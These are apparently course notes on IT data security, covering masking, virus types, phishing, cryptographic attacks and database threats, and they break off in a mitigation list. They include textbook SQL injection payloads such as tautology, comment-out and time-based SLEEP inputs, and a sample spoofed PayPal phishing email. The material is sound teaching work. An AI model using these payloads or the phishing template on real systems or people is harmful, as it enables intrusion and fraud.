IT DATA SECURITY

What is data security?

Data security is the practice of protecting digital information from unauthorized

access, corruption or theft throughout its entire lifecycle. This concept encompasses the entire
spectrum of information security. It includes the physical security of hardware and storage
devices, along with administrative and access controls. It also covers the logical security of
software applications and organizational policies and procedures.

Types of data security

To enable the confidentiality, integrity and availability of sensitive information,

organizations can implement the following data security measures:
1. Data Encryption
2. Data erasure
3. Data masking
4. Data resiliency

Encryption

By using an algorithm to transform normal text characters into an unreadable format,

encryption keys scramble data so that only authorized users can read it. File and database
encryption software serve as a final line of defense for sensitive volumes by obscuring their
contents through encryption or tokenization. Most encryption tools also include security key
management capabilities.

Data erasure

Data erasure uses software to completely overwrite data on any storage device,
making it more secure than standard data wiping. It verifies that the data is unrecoverable.

Data masking

By masking data, organizations can allow teams to develop applications or train

people that use real data. It masks personally identifiable information (PII) where necessary
so that development can occur in environments that are compliant. Data masking creates fake
versions of an organization's data by changing confidential information. Various techniques
are used to create realistic and structurally similar changes. Once data is masked, you can't
reverse engineer or track back to the original data values without access to the original
dataset.

Common Data Masking Examples

1. Masking customer data
Almost all medium- to large-size companies today use a CRM to
store and manage customer data, including names, phone numbers, email
addresses, employment history, and more. Protecting customers’ privacy (as
well as active and inactive leads) requires companies to take appropriate
measures to ensure this data is not accessible to unauthorized users. DM is
an effective method for anonymizing CRM data while maintaining data
reporting and BI (Business Intelligence) functionality. Shuffling, data aging,
and data pseudonymization are all effective methods for this data masking
example.
2. Masking employee data
Most large companies manage employee data in an HCM system. By
masking an HCM, organizations can protect the sensitive information it
contains, such as names, addresses, phone numbers, salary information,
health insurance status, and more. Specific data masking methods, such as
data pseudonymization or shuffling, could keep sensitive employee
information secure while ensuring that the data remains usable for legitimate
purposes, by relevant data consumers.
3. Masking financial data
Financial firms use various systems to store and manage investment
portfolios for their clients. System databases would contain a variety of
sensitive financial information pertaining to customers’ investments,
including account numbers, account balances, transaction histories, names,
Social Security Numbers, addresses, and more. The firm could anonymize
 its data by replacing sensitive information with dummy values, for example.
Anonymized data would still be accessible to authorized data consumers,
while upholding data security standards and complying with regulations
such as the Gramm-Leach-Bliley Act (GLBA).
4. Masking IP addresses
Companies that use log files to track the activities of users on its
application, website, or network may choose to mask the IP addresses in the
log files. Encrypted lookup substitution, redaction, or shuffling are all data
masking methodologies organizations could use to obscure real IP
addresses. In this data masking example, the organization could still use
masked IP addresses for testing or analytics purposes, while ensuring
compliance with user privacy laws, such as GDPR.
5. Masking medical data
Hospital and health system databases, such as EHR systems, store
and manage a wide range of personal information about patients, including
names, address, phone numbers, medical histories, and more. To protect
patients’ privacy and ensure compliance with relevant regulations (such as
HIPAA), hospitals can mask EHR data using shuffling or data aging
techniques to restrict access to unauthorized parties. In this data masking
example, patient data can still be used for analysis and reporting but would
not expose the hospital or patient to risk.

Shuffle Masking
Shuffle masking masks the data in a column with data from the same
column in another row of the table. Shuffle masking switches all the values
for a column in a file or database table. You can restrict which values to
shuffle based on a lookup condition or a constraint. Mask date, numeric, and
string data types with shuffle masking.
 For example, you might want to switch the first name values from one
customer to another customer in a table. The table includes the following
rows:

100 Kamatchi Kartheeban

101 Ravi Kumar
102 Ram Gopalakrishnan
103 Santhosh Pandian

When you apply shuffle masking, the rows contain the following data:

100 Ram Kartheeban

101 Santhosh Kumar
102 Kamatchi Gopalakrishnan
103 Ravi Pandian

Data resiliency

Resiliency depends on how well an organization endures or recovers from any type of
failure—from hardware problems to power shortages and other events that affect data
availability. Speed of recovery is critical to minimize impact.

Data resiliency refers to an organization's ability to recover from data breaches and
other types of data loss, immediately enact business continuity plans, effectively recover lost
assets and aggressively protect that organization's data moving forward.

Data security strategies

A comprehensive data security strategy incorporates people, processes and

technologies. Establishing appropriate controls and policies is as much a question of
organizational culture as it is of deploying the right tool set. This means making information
security a priority across all areas of the enterprise.

Consider the following facets in your data security strategy:

 1. Physical security of servers and user devices
2. Access management and controls
3. Application security and patching
4. Backups
5. Employee education
6. Network and endpoint security monitoring and controls

Physical security of servers and user devices

You might store your data on premises, in a corporate data center

or in the public cloud. Regardless, you need to secure your facilities
against intruders and have adequate fire suppression measures and
climate controls in place. A cloud provider assumes responsibility for
these protective measures on your behalf.

Access management and controls

Follow the principle of “least-privilege access” throughout your entire IT

environment. This means granting database, network and administrative account access to as
few people as possible, and only to individuals who absolutely need it to get their jobs done.

Application security and patching

Update all software to the latest version as soon as possible after patches or the
release of new versions.

Backups

Maintaining usable, thoroughly tested backup copies of all critical data is a core
component of any robust data security strategy. In addition, all backups should be subject to
the same physical and logical security controls that govern access to the primary databases
and core systems.

Employee education

Transform your employees into “human firewalls”. Teaching them the importance of
good security practices and password hygiene and training them to recognize social
engineering attacks can be vital in safeguarding your data.
Network and endpoint security monitoring and controls

Implementing a comprehensive suite of threat management, detection and response

tools in both your on-premises and cloud environments can lower risks and reduce the chance
of a breach.

Data Security Threats

 A data security threat is any action that could DEMAGE the confidentiality, integrity
or availability of data.
 Data security threats can come from a variety of sources, including hackers, insider
threats, natural disasters and human error.
 Data breaches can have serious consequences for businesses and consumers alike,
including financial losses, compromised identities and damaged reputations.
To protect their assets, companies need to do their due diligence and make sure they have a
system in place that will minimize data security threats by educating employees, monitoring
networks for vulnerabilities and more.

Types Of Data Security Threats

There are many data security threats that organizations face daily. Some of these
threats include
 malware
 ransomware
 phishing attacks and social engineering.

1. Malware is a type of software that is designed to harm or damage a computer system.

It can be installed on a system through various means, including email attachments,
infected websites and malicious adverts. Once installed, malware can delete files,
steal information or make changes to a system that can render it unusable.
2. Ransomware is a type of malware that encrypts a victim's files and demands a ransom
be paid to decrypt them. This type of attack can be particularly damaging to
organizations, as it can result in the loss of important data.
3. Phishing attacks are another common type of threat that organizations face. These
attacks involve sending emails that appear to be from a trusted source, such as a bank
 or other financial institution. The email will usually contain a link that leads to a
website that looks identical to the legitimate site. However, the website is designed to
steal the victim's login credentials.

How To Protect Data From Cybercriminals

 Data security is one of the most important aspects of online life. Without data
security, our personal information, financial information and other sensitive data
would be vulnerable to cybercriminals. There are many ways to protect your data
from cybercriminals, including using strong passwords, installing antivirus software
and using firewalls.

 One of the best ways to protect your data is to use a password manager. A password
manager helps you create and manage strong passwords, and it keeps all of your
passwords in one place. This makes it easier to create and remember complex
passwords, and it also makes it harder for cybercriminals to hack your account.

 Another way to protect your data is to install antivirus software. Antivirus software
helps to protect your computer from malware, which can include viruses, spyware and
other malicious software. Antivirus software can also help remove any existing
malware from your computer.

 Finally, you can use a firewall to protect your data. A firewall is a piece of hardware
or software that helps to block incoming and outgoing network traffic. Firewalls can
be used to prevent cybercriminals from accessing your computer, and they can also
help to protect your data from being stolen.
 Types of Viruses

Armored Virus
 An armored virus is a computer virus that contains a variety of
mechanisms specifically coded to make its detection and decryption very
difficult.

 One of these methods involves fooling anti-virus software into believing

that the virus is resides somewhere other than its real location, which
makes it difficult to detect and remove.

 Another kind of armor is implemented by adding complicated and

confusing code, which has no other purpose other than to mask the virus
and prevent virus researchers from creating an effective countermeasure.

Companion Virus
 A companion virus is a type of computer virus that attaches itself to
legitimate programs and runs simultaneously with them.

 It doesn’t modify the original program’s file; instead, it creates a separate

infected file with a similar name, leading the user to execute the virus
unintentionally.

 As a result, the virus spreads and can cause damage or allow unauthorized
access to the infected system.

Key Takeaways
1. Companion Virus is a type of malware that disguises itself as a legitimate
program and is designed to run parallel to an existing executable file
without altering or infecting it directly.
 2. It typically spreads by attaching itself to other applications or files and is
executed when the user inadvertently launches the infected program,
leading to the simultaneous launch of the virus.

3. Preventing Companion Virus infections requires adopting good security

practices like using a reputable antivirus program, updating software
regularly, and avoiding the download of files from unknown sources.

Macro virus - Melissa virus

 A macro virus is a piece of malicious code written in the same macro

language used in everyday applications, such as Microsoft Word, Excel, and
Powerpoint.

 The attack code commonly hides in documents and spreadsheets and is

activated as soon as you open the file.

 As a result, it can infect any computer running any kind of OS,

including Windows, macOS and Linux.

 With the release of Microsoft Office 2000 and all subsequent versions,
Microsoft disabled macros by default. Since then, it's become more
difficult for bad actors to easily launch macro viruses.

 However, as long as macros are available to users, the risk of macro

viruses remains serious.

Multipartite Virus
 A multipartite virus is a type of fast-acting malware that attacks a
device's boot sector and executable files simultaneously.
  Multipartite viruses are often considered more problematic than
traditional computer viruses due to their ability to spread in multiple
ways.
 They are considered to be much more destructive than other viruses.
Multipartite viruses infect computer systems multiple times, at varying
times and in order to eradicate the virus it must be purged from the entire
system.
 Failure to do so can result in the system being repeatedly re-infected if
all parts of the virus are not eradicated.

Signs Your System is Infected

 Constant pop-up messages warning you that your computer has low

memory. As the virus spreads to the executable files, it will automatically

consume memory
 The computer's hard drive may be reformatted. Specific types of
multipartite viruses do this in an effort to override anti-malware solutions.
Even if anti-malware software removes the infection, the virus may
reformat the hard drive in an effort to reinfect the computer

Polymorphic Virus:
‘Poly’ refers to many and ‘morphic’ refers to forms. Therefore as the name
suggests polymorphic virus is a complicated computer virus that changes its
form as it propagates to avoid detection by antivirus. It is a self-encrypting
virus that pairs a mutation engine along with a self-propagating program code.
A Polymorphic Virus Consists of:
 A decryption routine.
 An encrypted virus body.
 A mutation engine that generates randomized decryption routines.
 In polymorphic viruses, the mutation engine and virus body are
encrypted.
  When an infected program is executed, the virus decryption routine
gains control of the computer decrypts the virus body and mutation
engine. The control is then transferred to the virus which locates a
new program to infect.
 As the virus body is encrypted and the decryption routine also varies
from infection to infection, the virus scanners cannot scan for a fixed
signature or a fixed decryption routine making it difficult to detect.

Working of Polymorphic Virus:

 malware like Emotet is a banking Trojan that steals sensitive

information while misleading cybersecurity tools to hide. Another

example of polymorphic malware is Win32/VirLock ransomware.

What is a stealth virus?

  A stealth virus is a computer virus that uses various mechanisms to avoid
detection by antivirus software.
 It takes its name from the term stealth, which describes an approach to
doing something while avoiding notice.
 Typically, a stealth virus can hide in the legitimate files, partitions or boot
sectors of a computing device without alerting the antivirus software or
notifying the user of its presence.
 Once injected into a computer, the virus enables the attackers to operate
and gain control over parts of the system or the entire system.

 A stealth virus has an intelligent architecture, making it difficult to

eliminate it completely from a computer system. The virus is smart
enough to rename itself and send copies to a different drive or location,
evading detection by the system's antivirus software. The only way to
remove it is to completely wipe the computer and rebuild it from scratch.
 booting a computer system from a removable disk, such as a USB drive,
prevents the stealth virus from running amok before the antivirus
or antimalware software scans for malware. Sophisticated, up-to-date
antivirus software can also help reduce the risk of infection or eradicate a
virus entirely.

Critical data for organizations

o Customer Information – The data associated to its customer should be of topmost
priority.
o Product Information – Protecting information about the existing products and the
products to be launched can be a high priority thing for many organizations.
o Employee Information – All the detailed personal information of the employees are
in the possession of most of the organizations.
o Company Information – An organization has various critical data which it needs to
protect.

Elements to consider for a better security mechanism

 o Cost – The cost plays an important role.
o The Price of Disruption – An organization must always go with the
option which causes the least amount of disruption while implementing
data security mechanism.
o What is to lose – Security needs of an organization must be of utmost
priority if the business of this organization realize on the trust of the
customer.
o Where Potential Threat are – An organization should always consider
the biggest threat that their sensitive data faces.
Processes

Key Elements of Robust Data Protection Strategy

 A data protection strategy can help companies lessen the risks associated with various
data-related activities.
 It achieves this goal by identifying and tackling these risks while reducing the
possibility of other damaging events.
 Identifying the desired result and the necessary steps to build compelling data
protection strategies is crucial.
 Moreover, to ensure effectiveness, companies must clearly understand how these
strategies can address their specific concerns.

1. Transparent Data Risk Analysis

o The first and most important exercise for data protection is to assess the need
for tools and policies.
o There should be a clear and accurate assessment of the risks that the data
faces.
o This would also help to calculate the losses in the incident of a breach.
o Another critical aspect of an accurate risk assessment is that it will also clarify
the budgets needed for the strategy to be put in place.

2. Strong Data Encryption

o A good data protection strategy should ensure appropriate measures are in
place to prevent unnecessary risks.
o The companies that most effectively manage their data throughout its lifecycle
will have the best opportunities for success.
o Encrypting data makes it more secure, to begin with. It discourages threat
actors form accessing data they try to steal or compromise.

3. Stringent Data Backup and Recovery Tools

o Another notable element of any data protection plan is the ability to recover
from any data breach or attack.
o To achieve this, companies should keep regular backups of all critical data and
systems.
o Even if there is an incident, they will be able to restore data and neutralize
cyber threats.
o Threats that can disrupt a business are practically infinite.
o Updating policies and procedures regularly allows an organization to be well-
prepared to take on threats.
o Furthermore, the type of data that needs to be backed up, its frequency, and
storage location should also be identified in advance.
 4. Zero Trust Access Policies
o To protect data, it is critical to ensure that all reasonable precautions are in
place.
o Ensuring no trust for unauthorized access is critical to ensure any semblance
of data security.
o A data protection strategy needs to be stringent about multiple authentications
of users for access to data. The primary approach to achieving this is to
prevent all unauthorized access by parties. This will play a big role in blocking
attacks on the network and infrastructure.
o Deploying data breach prevention strategies using antivirus and antispyware
utilities and other tools can offer improved threat protection. Enterprises can
use firewalls and other perimeter security hardware and software for added
protection.

5. Meeting Data Storage Safety Standards and Regulatory Compliance

o Complying with domestic and foreign data protection laws is vital in today’s
business world. Businesses can also enhance their efficiency and profitability
by investing in data compliance.
o Effective data compliance practices keep company data up-to-date and
accurate. It helps protect it from costly errors and improves the overall quality
of business operations.
o With valuable data compliance strategies, businesses can significantly reduce
the time and money spent on handling data. Then it becomes an investment
that pays off both in the short and long term, ensuring success and peace of
mind for all involved.

Phishing Attacks

Phishing attacks are a type of cyber-attack where an attacker sends a fake

message, email, or link that appears to be from a legitimate source, aiming to
trick victims into revealing sensitive information or installing malware.
The most common examples of phishing attacks are performed either in one of
the following ways.
 on-path attack
 cross-site scripting attacks

i. on-path attack
 On-path attackers place themselves between two devices (often a web
browser and a web server) and intercept or modify communications
between the two.
 The attackers can then collect information as well as impersonate
either of the two agents.
 In addition to websites, these attacks can target email
communications, DNS lookups, and public WiFi networks.

Example:
 You can think of an on-path attacker like a rogue postal worker who
sits in a post office and intercepts letters written between two people.
  This postal worker can read private messages and even edit the
contents of those letters before passing them along to their intended
recipients.
 In a more modern example, an on-path attacker can sit between a user
and the website they want to visit and collect their username and
password.
 This can be done by targeting the HTTP connection between the user
and the website; hijacking this connection lets an attacker act as a
proxy, collecting and modifying information being sent between the
user and the site.
 Alternately the attacker can steal a user’s cookies (small pieces of data
created by a website and stored on a user’s computer for identification
and other purposes).
 These stolen cookies can be used to hijack a user’s session, letting an
attacker impersonate that user on the site.

cross-site scripting
 Cross-site scripting (XSS) is an exploit where the attacker attaches
code onto a legitimate website that will execute when the victim loads
the website. That malicious code can be inserted in several ways.
 Most popularly, it is either added to the end of a url or posted directly
onto a page that displays user-generated content.
 In more technical terms, cross-site scripting is a client-side code
injection attack.

Types of Phishing

1. Email Phishing:
  Attacker sends a fake email that appears to be from a legitimate source
(e.g., bank) asking for sensitive information (e.g., login credentials).
 Example: An email that looks like it's from your bank, asking you to click
a link and enter your login details.
 The link leads to a fake website that steals your login credentials.
Example:

Subject: Urgent: Your Account Will Be Suspended

From: "support@paypal.com" (spoofed email address)
Body:
"Dear valued customer,

We've noticed suspicious activity on your PayPal account. To protect your

account, we need you to verify your identity. Please click the link below to
confirm your login credentials:

[Insert suspicious link here]

If you don't take action, your account will be suspended within 24 hours.

Best regards,

2. Spear Phishing:
 An email tailored to a specific individual, using their name and company
information.
 The email appears to be from a colleague or supervisor, asking for sensitive data.
3. Whaling:
  An email targeting high-level executives, attempting to trick them into revealing
sensitive information.
 The email may appear to be from a government agency or legal authority.
4. Smishing:
 An SMS or text message claiming to be from a bank or service provider.
 The message asks you to click a link or provide sensitive information.
5. Vishing or Voice Phishing:
 A voice call claiming to be from a bank or service provider.
 The caller asks for sensitive information or directs you to a fake website.

Identity theft
Identity theft occurs when someone uses your personal information
without your permission to commit fraud or other crimes. Here's an example:

Example:
John's wallet is stolen, containing his driver's license, credit cards, and
Social Security card. The thief, Jane, uses John's information to:
 1. Open a new credit card account in John's name, charging thousands of
dollars.
2. Apply for a loan in John's name, using his Social Security number and
credit history.
3. Use John's driver's license to pose as him and commit crimes, resulting in
John receiving traffic tickets and even an arrest warrant.

Types of identity theft:

1. Financial identity theft: Using someone's information to access their
financial resources or obtain credit.
2. Criminal identity theft: Using someone's identity to commit crimes,
resulting in the victim facing legal consequences.
3. Identity cloning: Creating a new identity using someone's information,
often to evade law enforcement or hide one's own identity.
4. Medical identity theft: Using someone's information to obtain medical
care or prescription drugs.
5. Synthetic identity theft: Creating a new identity using a combination
of real and fake information.
Warning signs of identity theft:
 Unexplained credit card charges or accounts.
 Mysterious loans or credit inquiries.
 Missing mail or bills.
 Unfamiliar accounts on credit reports.
 Receiving strange calls or emails asking for personal information.

Protection tips:
 Monitor credit reports and accounts regularly.
 Use strong, unique passwords and two-factor authentication.
 Keep personal documents secure and shred sensitive information.
 Be cautious when sharing personal information online or in public.
 Use identity theft protection services or credit monitoring tools.
 Unit - II
Cryptographic Attacks
What is cryptography?
Cryptography is a security mechanism for storing and transmitting sensitive data such
that only the sender and the intended receiver can read or understand it. Key(s) are used to
encode (at the sender's end) and decode (at the receiver's end) the data. Encryption is the
process of converting plaintext or data into ciphertext or encoded data (that is not readable to
everyone). Converting the ciphertext or encrypted data to a readable form or decoded version
is called decryption.

What are cryptography attacks?

A cryptographic attack is a method used by hackers to target cryptographic solutions
like ciphertext, encryption keys, etc. These attacks aim to retrieve the plaintext from the
ciphertext or decode the encrypted data. Hackers may attempt to bypass the security of a
cryptographic system by discovering weaknesses and flaws in cryptography techniques,
cryptographic protocol, encryption algorithms, or key management strategy.

Passive and active attacks

A cryptography attack can be either passive or active.

 Passive attacks: Passive cryptography attacks intend to obtain

unauthorized access to sensitive data or information by intercepting or
eavesdropping on general communication. In this situation, the data and
the communication remain intact and are not tampered with. The attacker
only gains access to the data.
  Active attacks: On the other hand, active cryptography attacks involve
some kind of modification of the data or communication. In this case, the
attacker not only gains access to the data but also tampers with it.

Types of cryptography attacks

Depending on the type of cryptographic system in place and the information available to
the attacker, these attacks can be broadly classified into six types:

 Brute force attack

Public and private keys play a significant role in encrypting and

decrypting the data in a cryptographic system. In a brute force attack, the
cybercriminal tries various private keys to decipher an encrypted message
or data. If the key size is 8-bit, the possible keys will be 256 (i.e., 28).
The cybercriminal must know the algorithm (usually found as open-
source programs) to try all the 256 possible keys in this attack technique.

Types of Brute Force Attacks

Each brute force attack can use different methods to uncover your sensitive data. You
might be exposed to any of the following popular brute force methods:
1. Simple brute force attack: It uses a systematic approach to
'guess' that doesn't rely on outside logic. Hackers attempt to
logically guess your credentials, which completely unassisted from
software tools or other means. These can reveal extremely simple
passwords and PINs.
2. Dictionary attacks: It guesses usernames or passwords using a
dictionary of possible strings or phrases. A hacker chooses a target
and runs possible passwords against that username. Dictionary
attacks are the most basic tool in brute force attacks. While not
necessarily being brute force attacks in themselves, these are often
used as an important component for password cracking.
3. Hybrid brute force attacks: It starts from external logic to
determine which password variation may be most likely to succeed
and then continues with the simple approach to try many possible
variations. A hybrid attack usually mixes dictionary and brute force
attacks. These attacks are used to figure out combo passwords that
mix common words with random characters.
4. Rainbow table attacks: A rainbow table is a pre-computed table
for reversing cryptographic hash functions. You can use it to guess a
function up to a certain length consisting of a limited set of
characters.
5. Reverse brute force attack: A reverse brute force attack reverses
the attack strategy by starting with a known password. It uses a
common password or collection of passwords against many possible
usernames. Then hackers search millions of usernames until they
find a match. Targets a network of users for which the attackers
have previously obtained data. Many of these criminals start with
leaked passwords that are available online from existing data
breaches.
6. Credential stuffing: It uses previously-known password-username
pairs, trying them against multiple websites. If a hacker has a
username-password combo that works for one website, they'll try it
in tons of others as well. Since users have been known to reuse
login info across many websites, they are the exclusive targets of an
attack. Exploits the fact that many users have the same username
and password across different systems.
Brute Force Attack Tools
Guessing a password for a particular user or site can take a long time, so hackers have
developed tools to do this task faster.

 Ciphertext-only attack

In this attack vector, the attacker gains access to a collection of

ciphertext. Although the attacker cannot access the plaintext, they can
successfully determine the ciphertext from the collection. Through this
attack technique, the attacker can occasionally determine the key.

 Chosen plaintext attack

In this attack model, the cybercriminal can choose arbitrary plaintext data
to obtain the ciphertext. It simplifies the attacker's task of resolving the
encryption key. One well-known example of this type of attack is the
differential cryptanalysis performed on block ciphers.
Let’s now consider the chosen-plaintext attack.
In this case, we can relax the previous constraint and assume we aren’t
certain of the encryption algorithm being used. However, we can still choose a
set of plaintexts and compare them with the resulting ciphertexts in order to
learn something about the encryption algorithm and its associated key.

If we begin with the plaintext, plaintext=11111111 , we will obtain

the ciphertext=01010101 as we discussed earlier. We could then consider
changing the last bit of the plaintext and observe how the ciphertext
changes accordingly. In doing so, and in changing every remaining bit of the
plaintext in sequence, we would develop the following table of associations:

Plaintext Ciphertext

11111111 01010101

11111110 01010100

11111101 01010111

11111011 01010001

11110111 01011101

11101111 01000101

11011111 01110101

10111111 00010101

01111111 11010101

In varying each individual bit of the plaintext and comparing the corresponding
encrypted text, we could notice that the bit we vary is consistently negated in
the encryption process. We could also notice that, as one bit varies, the
remaining ones are left untouched: in this case, we should strongly suspect that
the encryption involves a bit-wise operator of some kind; that would, in turn,
significantly restrict the search space of the possible encryption algorithms
that generate the ciphertexts.

 Chosen ciphertext attack

In this attack model, the cybercriminal analyzes a chosen ciphertext

corresponding to its plaintext. The attacker tries to obtain a secret key or
the details about the system. By analyzing the chosen ciphertext and
relating it to the plaintext, the attacker attempts to guess the key. Older
versions of RSA encryption were prone to this attack.

A chosen ciphertext attack (CCA) is a type of attack on an encryption

scheme where an attacker has the ability to decrypt chosen ciphertexts
and use the results to deduce the encryption key or decrypt other
ciphertexts. Here's a simple example:

Suppose we have a simple substitution cipher where each letter is shifted

by a fixed number of positions in the alphabet (e.g., Caesar cipher). The
encryption key is the shift value.

1. Attacker chooses a ciphertext: "zhofrh wr fvh"

2. Attacker asks the oracle (the decryption function) to decrypt the
ciphertext.
3. Oracle responds with the plaintext: "WELCOME TO CSE"
4. Attacker analyzes the decryption result and notices that the first letter
"Z" was decrypted to "W", which means the shift value is 3 (since Z is 3
positions ahead of W in the alphabet).
 5. Attacker uses this knowledge to decrypt other ciphertexts or even
encrypt their own messages using the same key.

 Known plaintext attack

In this attack technique, the cybercriminal finds or knows the plaintext of

some portions of the ciphertext using information gathering techniques.
Linear cryptanalysis in block cipher is one such example.
Let’s try the following values:
 The encryption key, whose value we don’t know, is KEY=10101010
 The first plaintext we consider for both attacks will be
plaintext=11111111
We’ll begin with the known-plaintext attack. By the hypothesis of this attack,
we get to know in advance the ciphertext that results out of
encryption(Plaintext,key). Accordingly, the value of ciphertext is 01010101.
Because we know both plaintext=11111111 and ciphertext=01010101, in this
case we can exactly compute key as key=plaintext + ciphertext, and
therefore key=11111111 + 01010101 = 10101010.

 Key and algorithm attack

Here, the attacker tries to recover the key used to encrypt or decrypt the
data by analyzing the cryptographic algorithm.

How to Create Protect Passwords

 As a user, you can do many things to support your protection in the
digital world. The best defence against password attacks is ensuring that
your passwords are as strong as they can be.
  Brute force attacks rely on time to crack your password. So, your goal is
to make sure your password slows down these attacks as much as
possible because if it takes too long for the breach to be worthwhile, most
hackers will give up and move on.

Here are a few ways you can create strong passwords against brute attacks, such
as:

o Use an advanced username and password: Protect yourself with

stronger credentials than admi and password to keep out these attackers.
The stronger this combination is, the harder it will be for anyone to
penetrate it.
o Use a password manager. Installing a password manager automates
creating and keeping track of your online login info. These allow you to
access all your accounts by first logging into the password manager. You
can then create extremely long and complex passwords for all the sites
you visit, store them safely, and you only have to remember the one
primary password.
o Stay away from frequently used passwords. It’s important to avoid the
most common passwords and to change them frequently.

Identity attacks
Identity attacks refer to malicious activities aimed at stealing,
manipulating, or exploiting individuals' personal information, credentials, or
identities to gain unauthorized access, privileges, or benefits. These attacks
target sensitive data such as:
 Names
 Passwords
 Social Security Numbers (SSNs)
 Credit card information
 Email addresses
 Personal identifiable information (PII)
Identity attacks can be launched through various tactics, including:

1. Phishing: A social engineering attack where attackers trick victims into

revealing sensitive information (e.g., passwords, credit card numbers) via
fake emails, texts, or websites that mimic legitimate sources.

2. Spear Phishing: A targeted phishing attack focused on a specific

individual or group, often using personalized information to increase the
likelihood of success.

3. Whaling: A spear phishing attack targeting high-level executives or

decision-makers, aiming to steal sensitive information or gain access to
systems.

4. Identity Theft: The unauthorized use of someone's personal information

(e.g., name, SSN, credit card details) to commit fraud or other crimes.

5. Impersonation: An attacker assumes the identity of a legitimate user or

entity to gain access to systems, data, or privileges.

6. Man-in-the-Middle (MitM) Attack: An attacker intercepts

communication between two parties, potentially stealing sensitive
information or injecting malicious content.

7. Session Hijacking: An attacker takes control of a user's session after

they've authenticated, allowing unauthorized access to sensitive data or
systems.
 8. Password Spraying: Attackers use automated tools to try a list of
commonly used passwords against multiple user accounts, hoping to find
a match.

9. Credential Stuffing: Attackers use previously compromised

username/password combinations to gain access to other accounts,
exploiting password reuse.

10. Account Takeover (ATO): An attacker gains unauthorized access to a

user's account, often using stolen or weak credentials, to perform
malicious activities.
The goals of identity attacks can include:
 Financial gain (e.g., fraud, theft)
 Unauthorized access to systems, data, or resources
 Identity theft
 Reputation damage
 Espionage
 Other malicious activities

Identity attacks can be categorized into two main types:

1. Identity theft: Stealing personal information to impersonate or assume
someone's identity.
2. Identity manipulation: Altering or falsifying identity information to
deceive or mislead.

Threats to Database Security

 Database security refers to the measures taken to protect a database from
unauthorized access, use, disclosure, disruption, modification, or destruction. It
involves a combination of administrative, technical, and physical controls to
ensure the confidentiality, integrity, and availability of the data stored in the
database.

Database security includes:

1. Access control: Limiting access to authorized users and controlling their

privileges.
2. Authentication: Verifying user identities before allowing access.
3. Encryption: Protecting data in transit and at rest.
4. Backup and recovery: Ensuring data availability in case of failures or
disasters.
5. Auditing and monitoring: Tracking database activities and detecting
potential security threats.
6. Data masking and anonymization: Protecting sensitive data by masking or
anonymizing it.
7. Intrusion detection and prevention: Identifying and blocking unauthorized
access attempts.
8. Secure coding practices: Developing secure database applications and
interfaces.
9. Physical security: Protecting database servers and storage media from
physical access.
10. Adhering to regulatory requirements and organizational Compliance and
governance: policies.

Effective database security ensures:

 Confidentiality: Protecting sensitive data from unauthorized access.
  Integrity: Ensuring data accuracy and consistency.
 Availability: Maintaining access to data for authorized users.

Threats to database security can be categorized into several types:

1. Unauthorized Access: Hackers gaining access to sensitive data without

permission. The act of accessing, using, or manipulating database resources
without permission or exceeding authorized privileges. This can lead to:

 Data breaches: Sensitive data exposure or theft.

 Data tampering: Unauthorized modifications to data.
 Data destruction: Intentional deletion or corruption of data.
 Privilege escalation: Gaining elevated privileges to perform unauthorized
actions.
 Malicious activities: Performing harmful actions, such as inserting
malware or launching attacks.
Types of unauthorized access:
 External attacks: Hackers exploiting vulnerabilities or using social
engineering tactics.
 Insider threats: Authorized personnel abusing their privileges or
intentionally compromising security.
 Credential stuffing: Using stolen or compromised credentials to gain
access.
 SQL injection: Injecting malicious SQL code to manipulate data or gain
access.
To prevent unauthorized access:
 Implement robust access controls: Use strong authentication,
authorization, and accounting (AAA) mechanisms.
  Enforce least privilege: Grant only necessary privileges to users and
applications.
 Monitor and audit: Regularly monitor database activity and audit logs for
suspicious behavior.
 Use encryption: Protect data in transit and at rest.
 Keep software up-to-date: Regularly update database management
systems and plugins to patch vulnerabilities.
 Educate users: Raise awareness about database security best practices
and phishing attacks.

2. SQL Injection: Malicious SQL code injected into database queries to extract
or modify data.

SQL injection
SQL injection is a type of security vulnerability that occurs when an
attacker manipulates a SQL query to gain unauthorized access to a
database or alter its content. This typically happens when user inputs are
improperly sanitized or validated, allowing malicious SQL code to be
executed. Here are some common examples to illustrate SQL injection:

1. Basic SQL Injection

Scenario: A login form allows users to enter their username and password. The application
uses these inputs to create an SQL query to verify credentials.
Vulnerable SQL Query:

SELECT * FROM users WHERE username = 'user_input' AND password =

'pass_input';

Example Injection: If an attacker enters admin' -- as the username and leaves the password
field empty, the resulting query becomes:

SELECT * FROM users WHERE username = 'admin' --' AND password = '';
Explanation: The -- comment sequence in SQL comments out the rest of the query, so the
password check is bypassed. This could allow the attacker to log in as an admin if the
username admin exists in the database.

2. Union-Based SQL Injection

Scenario: A web application displays data from a database based on user input.
Vulnerable SQL Query:

SELECT * FROM products WHERE category = 'user_input';

Example Injection: If an attacker inputs ' OR 1=1 --, the resulting query becomes:

SELECT * FROM products WHERE category = '' OR 1=1 --';

Explanation: The condition 1=1 is always true, so the query returns all records from the
products table, potentially exposing sensitive data.

3. Blind SQL Injection

Scenario: A web application provides feedback on whether a username exists in
the database.
Vulnerable SQL Query:

SELECT * FROM users WHERE username = 'user_input';

Example Injection: If an attacker inputs a username like ' OR 1=1 --, the query
becomes:

SELECT * FROM users WHERE username = '' OR 1=1 --';

Explanation: The query always returns true due to 1=1, allowing the attacker to
infer information about the existence of users based on the application’s
response.
4. Error-Based SQL Injection
Scenario: An application returns detailed error messages when SQL queries
fail.
Vulnerable SQL Query:

SELECT * FROM orders WHERE order_id = 'user_input';

Example Injection: If an attacker inputs 1' OR '1'='1, the query becomes:

SELECT * FROM orders WHERE order_id = '1' OR '1'='1';

Explanation: The query always returns true because 1='1' is always true. The
application might reveal error messages that can be used to further probe the
database structure.

5. Time-Based Blind SQL Injection

Scenario: An application uses user input to filter data but does not return
detailed error messages.
Vulnerable SQL Query:

SELECT * FROM employees WHERE employee_id = 'user_input';

Example Injection: If an attacker inputs 1' OR IF(1=1, SLEEP(5), 0) --, the

query becomes:

SELECT * FROM employees WHERE employee_id = '1' OR IF(1=1, SLEEP(5), 0) --';

Explanation: The SLEEP(5) function causes the database to pause for 5

seconds. The attacker can infer whether the condition 1=1 is true based on the
delay, revealing information about the system.

Mitigation Strategies
 1. Parameterized Queries: Use parameterized queries or prepared
statements to ensure that user inputs are treated as data and not executable
code.

SELECT * FROM users WHERE username = ? AND password = ?;

2. Stored Procedures: Use stored procedures to encapsulate SQL logic and

reduce the risk of injection.
3. Input Validation: Validate and sanitize all user inputs to ensure they
conform to expected formats.
4. Least Privilege Principle: Limit database user permissions to the
minimum necessary to perform their tasks.
5. Error Handling: Avoid displaying detailed error messages to end-users;
